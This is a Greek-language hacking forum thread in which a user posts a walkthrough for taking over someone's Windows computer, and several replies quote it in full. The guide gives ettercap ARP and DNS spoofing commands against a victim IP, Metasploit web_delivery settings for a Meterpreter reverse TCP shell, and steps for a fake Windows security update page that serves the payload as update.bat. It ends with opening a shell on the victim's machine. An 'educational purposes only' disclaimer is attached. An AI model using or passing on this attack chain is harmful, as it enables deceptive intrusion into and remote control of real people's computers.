Μετάβαση στο περιεχόμενο
  • ChatBox

    ChatBox

    Chatroom Rules

    • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
    • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
    • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
    • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
z3n0r

Χάκαρε απομακρυσμένα έναν υπολογιστή χρησιμοποιώντας ψεύτικη ενημέρωση με Ettrercap και Metasploit

Recommended Posts

z3n0r

[hide]

Αρχικά πηγαίνουμε στο Kali Linux στον κατάλογο Home. Στη συνέχεια προχωράμε στο /etc/ettercap. Τώρα κάνουμε επεξεργασία τον φάκελο etter.dns

1.png?w=687

Τροποποιούμε το περιεχόμενο από το etter.dns και προσθέτουμε την προσωπική μας IP Address σαν Α εγγραφή.

2.png?w=687

Τώρα τρέχουμε την ακόλουθη εντολή με την IP Address του θύματος για να εξαπατήσουμε τον υπολογιστή του θύματος.
ettercap  –i  eth0 –T  –q  –P  dns_spoof  -M  ARP  /192.168.0.103.//

3.png?w=687


Θα ενεργοποιηθεί το dns_spoof plug-in

4.png?w=687

 

Ανοίγουμε τον τερματικό και πληκτρολογούμε msfconsole για να ανοίξουμε το metasploit
Τώρα πληκτρολογούμε use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

5.png?w=687

Τώρα κάνουμε αντιγραφή αυτόν τον Powershell.exe κώδικα και κάνουμε αποθήκευση τον φάκελο σαν update.bat

6.png?w=687

Τώρα δημιουργούμε μία ψεύτικη ιστοσελίδα που εμφανίζει ένα ενημερωτικό μήνυμα ασφάλειας των Windows. Στην ιστοσελίδα δώστε σαν hyperlink τον φάκελο update.bat
7.png?w=687

Τώρα κάνουμε αποθήκευση την ιστοσελίδα σαν index.html και την κάνουμε επικόλληση στον κατάλογο /var/www/html

8.png?w=687

Τώρα εκκινούμε τον server Apache γράφοντας την ακόλουθη εντολή Service Apache2 start

9.png?w=687

 

 

Όταν το θύμα ανοίξει κάθε ιστοσελίδα, θα εμφανίζει το σχετικό παράθυρο με το μήνυμα ασφαλείας των Windows.

Όταν το θύμα κάνει κλικ στο download update link και κάνει αποθήκευση τον φάκελο batch. Ο φάκελος θα εκτελεστεί αυτόματα.

11.png?w=687

12.png?w=687

 

 

Τώρα θα αποκτήσεις τον ελέγχο από τον υπολογιστή του θύματος. Πληκτρολόγησε την ακόλουθη εντολή sessions -l για να εμφανιστoύν τα ανοιχτές sessions, όταν το θύμα ανοίξει τον 
σύνδεσμο.

Τώρα τα sessions είναι ανοιχτά, πληκτρολόγησε sysinfo για να λάβεις τις πληροφορίες του συστήματος. Έπειτα πληκτρολόγησε shell για να εισέλθεις στο command prompt του θύματος.

13.png?w=687

[/hide]

 

O παραπάνω οδηγός δημιουργήθηκε για εκπαιδευτικούς σκοπούς και μόνο, για οποιαδήποτε παράνομη χρήση δεν φέρω καμία ευθύνη.

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

LeontG

Ευχαριστώ πολύ!!!

«Οι ευφυείς λύνουν τα προβλήματα. Οι ιδιοφυείς τα προλαμβάνουν.»

                                                                                                    Άλμπερτ Αϊνστάιν

 

«Η μετριότητα δεν ξέρει τίποτα πάνω απ' αυτήν, το ταλέντο όμως αναγνωρίζει αμέσως τη μεγαλοφυΐα.»

                                                                                               Άρθουρ Κόναν Ντόιλ

 

«Ένας άνθρωπος πρέπει να κρατάει στη σοφίτα του μικρού μυαλού του εκείνα τα πράγματα που είναι πιθανό να χρησιμοποιήσει και τα υπόλοιπα να τα πετάξει στη βιβλιοθήκη του, απ' όπου μπορεί να τα πάρει όποτε τα χρειαστεί.»

                                                                                               Άρθουρ Κόναν Ντόιλ

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

lead3r9
On 22/2/2020 at 8:40 ΠΜ, asterios said:

Ευχαριστούμε.

 

On 21/2/2020 at 1:43 ΠΜ, z3n0r said:

 

Κρυφό Περιεχόμενο
hide.png
Για να μπορέσεις να δεις το κρυφό περιεχόμενο πρέπει να απαντήσεις κάτω απο το θέμα.
Όταν απαντήσεις τότε αυτόματα το περιεχόμενο θα ξεκλειδώσει και θα είναι ορατό.
Ευχαριστούμε

 

 

O παραπάνω οδηγός δημιουργήθηκε για εκπαιδευτικούς σκοπούς και μόνο, για οποιαδήποτε παράνομη χρήση δεν φέρω καμία ευθύνη.

 

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

Theodor
On 21/2/2020 at 1:43 ΠΜ, z3n0r said:

[hide]

Αρχικά πηγαίνουμε στο Kali Linux στον κατάλογο Home. Στη συνέχεια προχωράμε στο /etc/ettercap. Τώρα κάνουμε επεξεργασία τον φάκελο etter.dns

1.png?w=687

Τροποποιούμε το περιεχόμενο από το etter.dns και προσθέτουμε την προσωπική μας IP Address σαν Α εγγραφή.

2.png?w=687

Τώρα τρέχουμε την ακόλουθη εντολή με την IP Address του θύματος για να εξαπατήσουμε τον υπολογιστή του θύματος.
ettercap  –i  eth0 –T  –q  –P  dns_spoof  -M  ARP  /192.168.0.103.//

3.png?w=687


Θα ενεργοποιηθεί το dns_spoof plug-in

4.png?w=687

 

Ανοίγουμε τον τερματικό και πληκτρολογούμε msfconsole για να ανοίξουμε το metasploit
Τώρα πληκτρολογούμε use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

5.png?w=687

Τώρα κάνουμε αντιγραφή αυτόν τον Powershell.exe κώδικα και κάνουμε αποθήκευση τον φάκελο σαν update.bat

6.png?w=687

Τώρα δημιουργούμε μία ψεύτικη ιστοσελίδα που εμφανίζει ένα ενημερωτικό μήνυμα ασφάλειας των Windows. Στην ιστοσελίδα δώστε σαν hyperlink τον φάκελο update.bat
7.png?w=687

Τώρα κάνουμε αποθήκευση την ιστοσελίδα σαν index.html και την κάνουμε επικόλληση στον κατάλογο /var/www/html

8.png?w=687

Τώρα εκκινούμε τον server Apache γράφοντας την ακόλουθη εντολή Service Apache2 start

9.png?w=687

 

 

Όταν το θύμα ανοίξει κάθε ιστοσελίδα, θα εμφανίζει το σχετικό παράθυρο με το μήνυμα ασφαλείας των Windows.

Όταν το θύμα κάνει κλικ στο download update link και κάνει αποθήκευση τον φάκελο batch. Ο φάκελος θα εκτελεστεί αυτόματα.

11.png?w=687

12.png?w=687

 

 

Τώρα θα αποκτήσεις τον ελέγχο από τον υπολογιστή του θύματος. Πληκτρολόγησε την ακόλουθη εντολή sessions -l για να εμφανιστoύν τα ανοιχτές sessions, όταν το θύμα ανοίξει τον 
σύνδεσμο.

Τώρα τα sessions είναι ανοιχτά, πληκτρολόγησε sysinfo για να λάβεις τις πληροφορίες του συστήματος. Έπειτα πληκτρολόγησε shell για να εισέλθεις στο command prompt του θύματος.

13.png?w=687

[/hide]

 

O παραπάνω οδηγός δημιουργήθηκε για εκπαιδευτικούς σκοπούς και μόνο, για οποιαδήποτε παράνομη χρήση δεν φέρω καμία ευθύνη.

 

 

Edited by Theodor

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

kostas79

ευχαριστούμε για το ποστάρισμα!φυσικά το θύμα πρέπει να είναι σχετικά αδαές διότι γενικά αποφεύγουμε να πατήσουμε ότι έχει την κατάληξη .bat

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

mamalakis23
On 20/2/2020 at 6:43 ΜΜ, z3n0r said:

[hide]

Αρχικά πηγαίνουμε στο Kali Linux στον κατάλογο Home. Στη συνέχεια προχωράμε στο /etc/ettercap. Τώρα κάνουμε επεξεργασία τον φάκελο etter.dns

1.png?w=687

Τροποποιούμε το περιεχόμενο από το etter.dns και προσθέτουμε την προσωπική μας IP Address σαν Α εγγραφή.

2.png?w=687

Τώρα τρέχουμε την ακόλουθη εντολή με την IP Address του θύματος για να εξαπατήσουμε τον υπολογιστή του θύματος.
ettercap  –i  eth0 –T  –q  –P  dns_spoof  -M  ARP  /192.168.0.103.//

3.png?w=687


Θα ενεργοποιηθεί το dns_spoof plug-in

4.png?w=687

 

Ανοίγουμε τον τερματικό και πληκτρολογούμε msfconsole για να ανοίξουμε το metasploit
Τώρα πληκτρολογούμε use exploit/multi/script/web_delivery

msf exploit (web_delivery)>set lhost 192.168.0.125 (IP of Local Host)

msf exploit (web_delivery)>set lport 4444

msf exploit (web_delivery)>set target 2

msf exploit (web_delivery)>set payload windows/meterpreter/reverse_tcp

msf exploit (web_delivery)>exploit

5.png?w=687

Τώρα κάνουμε αντιγραφή αυτόν τον Powershell.exe κώδικα και κάνουμε αποθήκευση τον φάκελο σαν update.bat

6.png?w=687

Τώρα δημιουργούμε μία ψεύτικη ιστοσελίδα που εμφανίζει ένα ενημερωτικό μήνυμα ασφάλειας των Windows. Στην ιστοσελίδα δώστε σαν hyperlink τον φάκελο update.bat
7.png?w=687

Τώρα κάνουμε αποθήκευση την ιστοσελίδα σαν index.html και την κάνουμε επικόλληση στον κατάλογο /var/www/html

8.png?w=687

Τώρα εκκινούμε τον server Apache γράφοντας την ακόλουθη εντολή Service Apache2 start

9.png?w=687

 

 

Όταν το θύμα ανοίξει κάθε ιστοσελίδα, θα εμφανίζει το σχετικό παράθυρο με το μήνυμα ασφαλείας των Windows.

Όταν το θύμα κάνει κλικ στο download update link και κάνει αποθήκευση τον φάκελο batch. Ο φάκελος θα εκτελεστεί αυτόματα.

11.png?w=687

12.png?w=687

 

 

Τώρα θα αποκτήσεις τον ελέγχο από τον υπολογιστή του θύματος. Πληκτρολόγησε την ακόλουθη εντολή sessions -l για να εμφανιστoύν τα ανοιχτές sessions, όταν το θύμα ανοίξει τον 
σύνδεσμο.

Τώρα τα sessions είναι ανοιχτά, πληκτρολόγησε sysinfo για να λάβεις τις πληροφορίες του συστήματος. Έπειτα πληκτρολόγησε shell για να εισέλθεις στο command prompt του θύματος.

13.png?w=687

[/hide]

 

O παραπάνω οδηγός δημιουργήθηκε για εκπαιδευτικούς σκοπούς και μόνο, για οποιαδήποτε παράνομη χρήση δεν φέρω καμία ευθύνη.

 

Μοιράσου αυτή την δημοσίευση


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Απάντηση στο θέμα...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



ChatBox

ChatBox

Chatroom Rules

  • Το GreekHacking.Gr είναι ένα ελληνικό forum και επιτρέπεται μόνο η χρήση της Ελληνική Γλώσσας (ούτε greeklish).
  • Δεν επιτρέπονται οι βρισιές και γενικά η χρήση χυδαίας γλώσσας.
  • Απαγορεύεται αυστηρά το πορνογραφικό, προσβλητικό και βίαιο περιεχόμενο.
  • Μην χρησιμοποιείτε κεφαλαία γράμματα η σύμβολα.
×
×
  • Create New...